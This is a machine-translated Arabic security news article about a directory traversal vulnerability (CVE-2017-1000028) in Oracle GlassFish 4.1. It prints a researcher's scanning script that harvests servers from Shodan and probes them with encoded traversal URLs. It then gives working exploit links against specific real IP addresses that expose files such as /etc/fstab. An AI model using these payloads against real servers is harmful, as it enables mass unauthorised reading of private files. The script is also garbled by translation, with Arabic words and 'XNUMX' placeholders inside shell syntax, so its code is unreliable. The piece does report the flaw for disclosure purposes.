الأربعاء ، 1 أبريل ، 20:55
منزل التحقيقات GlassFish Oracle: عدم الحصانة يعرض البيانات لآلاف الخوادم حول العالم (تحليل)

GlassFish Oracle: عدم الحصانة يعرض البيانات لآلاف الخوادم حول العالم (تحليل)

GlassFish أوراكل الضعف: الباحث الأمني ​​ديمتريس روسيس يحللنا على أنه تعرض للمعروف خادم التطبيق لها GlassFish أوراكل المعترف بها CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028) يعرض البيانات حاليًا لآلاف الخوادم حول العالم.

أوراكل GlassFish

استغلالها فراغ السلامة يسمح بالقراءة من خلال نوع Directory Traversal Attack لجميع ملفات الخادم التي تم تثبيت Application Server عليها.

في التحليل الذي أجراه الباحث ، استخدموا أولاً خوادم 300 النموذجية عبر محرك بحث shodan الذي قام GlashFish بتثبيته على إصدار 4.1.

ثم ، من خلال برنامج نصي آلي أنشأه الباحث ، يتحققون من الخوادم الموجودة بالفعل. حساسية.

#! / bin / bash # أحصل على نتائج 300 من محرك بحث shodan - بحث shodan - الحد الأدنى 300 --fields ip_str GlassFish 4.1 port: 4848> servers_ip.txt # Sort IP cat servers_ip.txt | نوع-ن -t. -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt # Remove All Whitespace sed -r / s + // g 'servers_sort.txt> servers.txt # حذف الملفات المؤقتة rm servers_ip.txt rm servers_sort. txt # Server List input = "servers.txt" # check Server للتحقق من عدم الحصانة أثناء IFS = سطر قراءة r فعل ip = $ line # http: //server_ip/theme/META-INF/../../ .. /../../../../../../../ url = "http: // $ line: 4848 / theme / META-INF /٪ c0٪ ae٪ c0٪ ae٪ c0 ٪ af٪ c0٪ ae٪ c0٪ ae٪ c0٪ af ٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c0٪ ae٪ c5٪ ae٪ c200٪ ae٪ cXNUMX٪ ae ٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ ae٪ ٪ ae٪ cXNUMX٪ ae٪ cXNUMX٪ af "echo -n" ip: $ line "fetch =` curl -s -o / dev / null - وقت الحد الأقصى - XNUMX -w "٪ {http_code}" $ url`؛ إذا كان [$ fetch = XNUMX] عندئذٍ يردد "- اتصال ناجح! الخادم ضعيف" #Save ينتج عنه ech_servers.txt echo "$ url" >> weak_servers.txt else echo "- فشل الاتصال! الخادم غير محتمل" تم تنفيذ الاتصال "إدخال $"

خوادم

النتيجة النهائية للبرنامج النصي هي إنشاء ملف يحتوي على روابط (عناوين المواقع) لاستغلال الضعف على الفور.

النظر في الروابط المدرجة في الملف المتصفح يمكننا أن نرى جميع الملفات في / جذر الخادم.

التوضيح:

Windows المخدم

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

أوراكل GlassFish

خادم لينكس

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

خوادم GlassFish Oracle

يمكننا الآن الوصول إلى أي ملف نريده على الخادم عن طريق إضافة مسار الملف إلى نهاية عنوان url.

على سبيل المثال

/ الخ/ passwd

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

/ الجذر

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

توضح الدراسة أعلاه ، من ناحية ، أن الضعف يمكن أن يؤدي إلى الكشف عن البيانات واسعة النطاق في جميع أنحاء العالم والحاجة إلى التنفيذ الفوري للبيانات. تحديثات البرامج من قبل مسؤولي النظام.

يشكر فريق التحرير SecNews خالص الشكر الباحث ديمتريوس روسيس على المعلومات الصحيحة وفي الوقت المناسب.

* ديميتريس روسيس عضو في مختبر أمن نظم المعلومات بجامعة إيجه.

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

اترك الإجابة

الرجاء إدخال تعليقك!
الرجاء إدخال اسمك هنا

أخبار مباشرة

Italy Coronavirus: هجوم القرصنة على موقع المكافأة لمرة واحدة

إيطاليا Coronavirus: هجوم القرصنة على موقع خدمات الطوارئ - تم قبول هجوم القرصنة من قبل موقع الرعاية الاجتماعية الإيطالي ، ...

WinRAR: تم إصدار الإصدار 5.90 لأنظمة التشغيل Windows و Linux و Mac و c

WinRAR: الإصدار 5.90 لأنظمة التشغيل Windows و Linux و Mac و Android: إصدار WinRAR 5.90 النهائي مع ...

LimeRAT Trojan: ينتشر عن طريق تقنية تشفير ملفات Excel

تنشر حملة جديدة برنامج LimeRAT Remote Access Trojan باستخدام تقنية تشفير ملف Excel قديمة. LimeRAT هو حصان طروادة بسيط ...

لا يعرف البنتاغون أين يرسل الغطس!

وفقا لكبير ضباط اللوجستيات في البنتاغون ، على الرغم من التزامه بإرسال ...

تحذير: حتى MFA يمكن "اختراق"!

وفقًا لخبير أمان ، تعد المصادقة متعددة العوامل (MFA) طريقة جيدة لحماية الحسابات عبر الإنترنت دون ...

كيفية رقمنة أهم الوثائق الخاصة بك

في حين أن هذا الأسبوع هو اليوم العالمي للنسخ الاحتياطي ، إلا أنه يتم الاحتفال به عادةً من قبل صانعي الأقراص الصلبة وخدمات تخزين البيانات ، من المفترض ...

Linux Mint 20 “Ulyana”: يأتي بدون توزيعات 32 بت

في الأسبوع الماضي ، تم إصدار توزيع جديد لـ Linux Mint Debian Edition 4 (LMDE 4). كما نفهم من ...

لجنة الاتصالات الفدرالية: من 2021 مستخدمًا سيتم التحقق من صحة المكالمات

أعلنت اليوم لجنة الاتصالات الفدرالية (مجتمع الاتصالات الفيدرالية) أن جميع مزودي الهواتف المحمولة وكذلك أصحاب ...

Microsoft: تأخير COLID-19 TLS تعطيل البروتوكولات

أعلنت مايكروسوفت أمس أنها ستؤخر تعطيل بروتوكولات أمان طبقة النقل (TLS) غير الآمنة ...

من المرجح أن يتم إصدار iPhone 9 من Apple في 15 أبريل

إن وصول iPhone 9 من Apple هو شيء ينتظره العديد من مؤيدي الشركة. لكن ليس ...